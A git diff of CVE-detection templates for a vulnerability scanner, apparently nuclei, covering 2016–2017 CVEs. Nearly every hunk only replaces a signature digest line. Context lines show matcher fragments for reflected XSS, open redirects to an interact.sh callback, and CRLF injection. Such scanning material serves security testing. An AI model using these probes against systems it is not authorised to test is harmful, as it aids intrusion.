a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index cc7f58acc9..95557fbdb0 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and -# digest: 490a004630440220274c8fe4864f25f22fde055c7b74f729cbd20ad92e09493514b7e5eafce9593f022040e51a5e6f0350c7fae9de1ecbe382c2cfb9fbc97f9dfb9c2db2682a23c2891f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022061c0dedebb0512341b3aa74f82656c055dc78496472d976d9cbe26996534128402202417e6a5bd9a8f099c833261e718bebf7332cc556d4b4d9ea309a7b27c5966ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 0f81c1d6a2..17324f5022 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c130b02b2c3077341b11b3775c603b866d01c2a6caf462f0cc86a128710fb337022100894c39e5ef40da3e7381fb475feb380e4cc1a4411899df892855bf7bd33a63f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220384e339b7fb6cf60f13dacc427c050ffefc621beb71cb803c4f049c2a54ec81a022100f1f77122b07527b1e16dd07f2667a1e446ed964fb15d90043d2aa2016b7b8f13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 8ed041033e..7f0e58cdab 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022077431a2a530eaa3b19530f844f0a1c78d83d407a677d6a966ba3860fc99a1bb7022100b0519172142aebe889875162f4cf33b796a8ae6bc585ec0126e608a652318921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057f60194f0aa5d4f4b7af5646a5cdfb935df961de6e7272f8387d43ad3a05ec502204f2c908490c948ebff24f9fa9efe57471e6685dac2e399257028095127785014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 1641c2be7d..f7ce605792 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220509d3f8ae3ae615f3416ca9592bf7c89dbb4dbf02aef851d67b1011dbc51bbf8022100f0bd4f4fe6fd93a9128738a3ce0f331f01ac75012352d36d396a5236d4815a05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d70769e7de559199b7a90b55f9f98a6b65282e9feb95295d5cafeb363ec7a4640221008fa6a47054479e60d59e94251e83f7bddd61daeec4b3550abd4a823bca7d8d5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index ca227f66e3..3862e75bee 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -49,4 +49,4 @@ http: - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and -# digest: 490a00463044022001ecfed66bc4ca0efb31a68cbc4a3300c51e08e6e4aeb3bb06de1ece1d899a5d0220072340e6dbdb8d59c5ec882a0f8399de19f46c7627bc1d71141d28e44b8f4f9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a63bdf42915028231ac633931a6e8202d53e136bb2083a3c2a62d41d8f8eceff02201e1272728b23a81df24546003826f416b901d89f53d0e32c185b185f6f9c4da1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 5047e19355..28b600d45b 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a00463044022064c0ba89484715a2648d7b4e1b5e4c96a615f57e4559aa4712cd1c31edad4110022058abb2a9ba5472ffadadca662462dae939d740f2b676491d91ce372a351a422e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f2e6bc1438e7403bdb26dea66e6e9ec09fc03748d9c41d1b261928f8fe3a698022100eb1a6e807ad9f217c1a1ba0cd66ccedd6ebbb75e6d89a048dcb9c0b997ec1f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index e1daec70b1..cec984a66f 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol words: - dns -# digest: 4a0a00473045022100d6e9353a94ac258937539ed8ff40241674ca73fa8e78941808d2afb343bbb3ce0220533a4998d8ddd00b6627f06783d8a74f2ad7757a0b0b77ac31e1f5dc50898143:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220344ff60ba76c94ef37e505e82acd664668bec3608711431768e78250865de58f022053b426c40d672e0ed568fc3a60f2d4fce64207739f42d3652c0c93cb539a8e05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 1a9ff30dc6..1cfd82cc67 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' -# digest: 490a0046304402201e3d7b1750ea0331f37c87bdb7116e1196954a17c7399a700bf4282b0096b8e102200ffa21c484c0c36e220ad3c635a98bf45206dc33745bcfc70b6d117ccf0d0410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077fd59e73806cd4bbb9e7400a5ecef3c6f3b4b831f42dfe44052339f350e7b7e02205bba0213b74e6a14088b6c735b520aa7484a53f14eb5b399f1ac71baaafe5ed1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 329e960903..e6a701b561 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100ff1e44479b41d4d85fcab05aecb6554934e8ff786e17b401c4fe8d4e05c11291022023d6dfecd2d793de4c86b693a4dae0dafd48f1f50f0a637a5246de292bbcc080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdb4e642010afe72106d18900a2deacbcde8d4124a065ca3895d2ce0abc4eaac022100e58d6fcb6eaffbfab145481a3b80d1e98d98a62fcb2680b48513ef9f853071cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index b00a69edf6..476fda6fd2 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -52,4 +52,4 @@ http: regex: - 'Success "([a-z]+)"' part: body -# digest: 4b0a0048304602210096367ea3f8f0ad001aa17817e08f20ccb7fbcb41bc231665852f37d48b3efb3902210087d012ddefb1b99db5fe84e51863aa90315b368ef9dd249da7cbf53747766195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eebf1bb2ad06e08d886d0c1b2e3f778e34f5a525520d4c1c0035361f2d783ce602206159b8e5cfb1d0ee3c6c16083a9496e514f67f962b46421129c3e874a43e6931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 6d984ac092..b0b6ceefa3 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -56,4 +56,4 @@ http: - 200 - 503 condition: or -# digest: 4a0a00473045022062d8b9c1d7cfb77bc85c8ae92a77df9725867da724d8cb70c78a625caf2b9bef022100ea23f4abaafd298853cd237e31aa79490cddd8d986670715083a4a7c355c8204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205259ef1015f07d98bf88fa57fa6b5f9e06b041b44896a8c9cc6f44ddac59ede2022100e6c419811718d73fb40a8fecace9f02721229f5dffe60ca380462577ef8e2604:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index 833c42ebc2..185323650b 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d046569d3f45081a6d1082690bb763f2bb9471d9edd05d604e2ae025332a580602206ac62f4933c99a8b9ce07fbe940d958cb4be3dbeb94bc7b926cf5e151ae0199f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f9ab8e3ff6b3aee44c5163e5dcd11cc4969151abed14697910f138ad2cfa9e4002207fa48f375220c1b0859907dbb5a3e779c1a09d08350b867aca547c82c3289746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 11db8baf78..728635d352 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d6a7ed251426703aece365dfadf76c52c44897b708b13b969186c99ed609e3c20220135818f70a4e9778d4d2a4814d6211881eb74797518681bd61b62c2701636334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ce9f6d77348098318a24372b87abeaa536e7996ebd96b01955bad4f2272db7102201f096d71ee5e43aa319b13572e8830ec38a8ab21312a9312fd7dadac92429277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index d3e6ad1f62..e2ba68d094 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cfb1ffcfa7ecbc13c10c247b31827b1c2b9fbec1e77083749f67234c1a72d5f302210080f97a2c70380af5c9d3824e75ce79dab5c4da9902df724f8a81462a849880cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027788b07216f233997f36fb3ce416417ff64c694dfc3535e39835a01319d50c3022100d4a4057aa67928a4a77631e6e2789e053710d49f0a03ad5b322484a97001b025:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 344f4892a1..c1122d62a3 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 204 -# digest: 4a0a0047304502210082d3f0d6de5c0422935c4d3732ceaeabdd14ec72112f94834449d829812eea3802202d4b2a08ef863c1b6b7e6e4d2aaaaa7b0e88b9ae60aa9d821bb214529a8b26a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd42c7da6dfb8999c948161745f9eda3a2a96056008c6a59588cd5e36d61572e022100fbf54fbc960e5740b3a11a43d95f0081f9628b8dc9f376af3efe1236fec2790b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index b5bf78fb34..c412ff875e 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ee6d69587f3d7e7744647a2123e2584e4efbb250643f5afd79e8583815d3c4d102203ae76d70671a78c809781a3b9b3efa56e2c602f9dbf3f8bbd3a2c0a80200dab3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afa0c94956d8f7cada3a5085eca1a99b01fb1603d5e63c29330e32fd487ea9eb022014c5dbbbed8b23e6d16d7f7fd89ede026f23609c1a044b8a99ffa5222cc2dd95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 6ded2e7477..eff093ce75 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022012b0a1141fcca2a9e54f57e313f4182fa6798e6f2af153936548f7673366e6dd0221009e7da651f3ed1adaf7b19fc60ec6d3c0763929638bffc85cd0ac398e59e83303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f7bbe1c8239e8d0efc7c3e203a30ba70c22af08a6ea4dc458307cfc37beb0e0b022003b5fe09d0e2ec21448c21eb25694afc8172c24c74bff9c195db10d37d377f5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index ef179b9601..157acd7843 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100ff0b79bc31995c8c892a88c73b4b8e39e6127e1c68e0b7c55088bbd0a0b98b47022100eb467d39ef61c66d326e7c0e70c7ab0055c54bc06e9fe007641bb1fb0b3ca8e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100909949c76e0242882c52a12e3f4c2ec5da8b42eefe428a9e089cc0204e693f3c022018428ea9e138b69c66856269b05c63cff4ccf18a5189c42d55530642a783ce79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index 6483c3a920..3136f45d2b 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -50,4 +50,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a00473045022100f473dc3fdf8c2f4aaabebe291056c49f3124281aa3a47a9f31fb27c99e7498ac0220776defe7c12b34004f218cf773f9cefa1e5a7dba2150c94d207f299b167887ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220160455c1f84fa4c6d6610f5a3fdc15f8f838b11db749d1bd63c9a9bb22ba034c022050decc2d842cf86de817633f961859d9063e84899b9d30c99058826113c624f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index 6b49168faf..cff57e655a 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ebc2b52d2664bfdc3c2a5c0b60ba397dd2ea8df1deb6790fc6e05369babb1967022015da87e67f15d57df93eedd88ce24a06b02b4c6f6e355b6479d1a0020d9be3f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 0650577282..6948d4b0ac 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 490a00463044022061d920e4cf0cc267f5422bb075fb85b8a57687a359570425759dc88b3864306702200595972f0d206f6a97d8314e7c9dddcf854272edd6d96c902e7d18d6f88e8133:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022017d866002bfe98da5861e59a089a85dde898cce758c15a9718731c5408d1605102207f30a6b3a3ea9254e6e22f2bf409168ccf2a517f65a326f602f85e1e6a7e2276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 1fee6244a4..3a4a98f5cd 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100de5bd7b4fece1a9f461df86fbe6bee5fb4e2c4bc26b5f4b2ff803cc8f4fd3302022100dcf0958417769fd56c3b8e04540f8ae5bd0553b4575468f3934ae4b03238cded:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6bb36f4222c9a4268a7d345f8adca9f18d72f14e0dc726765472acfd78ef2c4022042a11423387906d40397a467949cab2ac7d0d696dc5c71b15429d3181b509888:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index ea71f16043..038d326c98 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -45,4 +45,4 @@ http: part: header words: - 'Mogwailabs: CHECKCHECK' -# digest: 4a0a0047304502201e438adbd2f0f976434a17c20b85ec68d50891622dffa3c1fc66e73fb8a175fd022100ac9295f7820226829d4c0a2fc6e91afd23b1d1a64d2aac21d0e8ceb9d383185e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa85f7020a226e84c23682f9c347c681e139eeeff756242e58ed764631ed0d9102201e4b34fed31c7b33830bf4ac75ecb9d382591f5721629e4ab979afb6ca6cc9b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 7085a63b85..d81d35df5f 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022050ddeab295f0f5b5ff2229fef47015ce60eb9b662eacbf82e4dcb694ece4de6502202f1447ddd180742a71065e40076b599f04cf262abb649f58dde5c639bb869416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010819a8a794f7913d5769d0d2a2fb4cb18e8bfc192f008923949764b6ee09b0902202313e8489672702f7e45dda26b24f2fc2e13a050288074feb90d080e5f3965af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index e55b3def3b..86947b4877 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -107,4 +107,4 @@ http: - body == "{{randstr}}" - status_code == 200 condition: and -# digest: 4a0a0047304502206f8a3318a5178a1d1d2ca24d6d105aa876b6dd510d9149d5df85dba577aca50c022100ebbb5d8cfb0f8e7b98248f30d09f63424829c1cefc596451f1844a9a34b3f10e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a1c6fe122b38f892d8bdce3efa4c395dd87ee73549be7945d4d2f257ca49b3b202203a33f260f9acc471a62f8fda2562e542864a4950043dae6ccb2667d5c7187bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 2a70320954..e0ddd07539 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e2504e94cb3256d100e4734abc2ba9a84bb35c72e8615dc357f3953b7d27f4fa022100baeb2dfd9a3fdcf5722eb171c77da94ab1da7e6d556ad4bbf50515b0b5fc93f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a060d248f9ac617377923d80c310fbd3128471d2b18b010777b770d175adfa7c022100d42b684da94a1f5ec6c9a1a74a0c670ad8aec993a85552c1730cb5ddc73bb08a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 8eb27b839b..21d5e5e43c 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022019205ca83cef3686b86bdea2d1d6d55fca0a091cf4d20750bc9ac7a855c782d1022100cdb0e22a20379b83984d0f9262a93b39f8e4def23b5bb88ced1496d67433d7e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad09099584b2a74d7b718adfb8cc4856c14504c4c7166cd70402c8959bf7b4bd02201923fa83a4f69c90802f18bb4340dd8bc125461174e18a8822c3a905bc94708e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index c4791eecb7..099dfa5cfb 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008eff8bb67d6080ac5ee0969d2417d4ddedb9265dc1ceebeaf37e63f14e89084002206841f4b09ccd220bb86a61610bb96f6e672d3ff3902b9cc22fc59865c1bdca0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220561107b0c7da4bdd0525bf6c8287694ec188162f4fb1d6f5f5785a76ad39bbf90220225f306aefd9422d4a38642ce27586a0d293e2be819d1b1f24978b77ea5d384e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 8468f43128..af3af351b8 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -45,4 +45,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4b0a004830460221009a11bee4341c7d482f5babbe13b08d1d8bf6f0228f61c299529ea583a585bfb2022100c38b3339d4f136c7b103e46cf1790e1bff89046995ac16d1a1206b25d655f46f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220396574a9d303f39e3b717afaacc9a7b803e6fbd71a9fc670671d1c28b349bd5e022100c0a0ee793f481dc0a5c97882c4c7b31848415a9b8d1c2bf36e281f5b0c11ea0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index 2ce190b54d..de488dde1e 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -45,4 +45,4 @@ http: part: header regex: - 'Refresh:(.*)url=http:\/\/interact\.sh' -# digest: 4a0a0047304502200a288e1dfe635d530db31748963e18fb235ec812796d8fea798f66b4e7da6f9c02210087716d81e3cbea58b9591e7cbf94adfdbcb55989feead96259dc70f6e5e35f8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b9dd6b07bd9874ead239ed591f16da9a600ac73cdc8404ed8e9bcc90e3918104022100bbe20d6aa691239c1573bbf7ccd5993f2127b310bae7ce921c22cc05c615efdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index 55a56afe8d..55ad4e26b8 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -65,4 +65,4 @@ http: - "" - "" condition: and -# digest: 490a0046304402204ef086474fdf3360ffea88f485401d4881f41840d507f8f85b7c57f278851e9602200bf5729901fca3960b3c5da15dce3fd420fedcd63830b0be8a46bf12317c5b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf14a5510119affb528192b7323c67a5f4a591d2502f424b0c48ce405707ace5022011ed794eaf111a1c5f68322e285989ac28c8b755721e246d87b1792f575aa50e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 1464d1dd04..b936e37f44 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c81fea3ebed14c3fd70428d6e9ebbd8af684e80acdce8a8bdf5f930a5e5cf8a7022100f233ec900fb928a1d116b54b2b5f954720aabf9289325db0217ceb2ccdad2658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2a6e549c2ecc8e1da8f24fb439177de38ccb87414172797ccfe5a714d983819022100a58eba0205cc680d29f8de174f831b8454b0154be7fadf558e9b181237dab906:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 3065dcad7c..ffbb7a156c 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -44,4 +44,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100fa67c1c9e88397fd853139dbf1cf93c9db6d998bc497150038c42f861347335c022100f2d652a8676912e3eaf0249b9966b28f683a18d17f60ea69b2db7e419d2f4806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ffbc1ebd75d2fe1da0f1dc478cfdae3e3639c2240bcddd8aa75e27bd6019757022100865dd313f03d83d9aa444d39f6f4d60d2150fc14bcdce0e174ea4a64184780e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 24f508adfa..e614af2694 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -61,4 +61,4 @@ http: status: - 200 - 500 -# digest: 4b0a00483046022100961026dd21b97de42852865d8eb6aaa1ebb31720de258aebea0d83a1dbbd595d022100a9f2f0d3fcb726ea029f816a68cc1c99d117a3d651a96c66a803b66bc242c625:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206a1d1c6a78399ac8fc387146630419931e7a0910ef2d9afbc2ecc12434ecdaa502204d23f9f16f2da24a977f50e4ee2eae05691d6b068349ea6d83efa30240d397fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index 5eb82a92f4..ccc46db680 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201a3e346c6a6b738d9fb52450d9452caafc3f26834b4e89d9df767b914c5efa0c02210089ea3b0ea81e681b48bb853890215506d457b8ea5f1a435889b6707ffeb66ce8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6fbc1f2a41850eecf35ae919827d0e5d5dec185cc9a4829929e4129784431cd022038be6c253f57ba145dc1c82ad580304a957ce4df70f038f5439afe06160d5fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index c99a1f1cbc..1538d69f3a 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 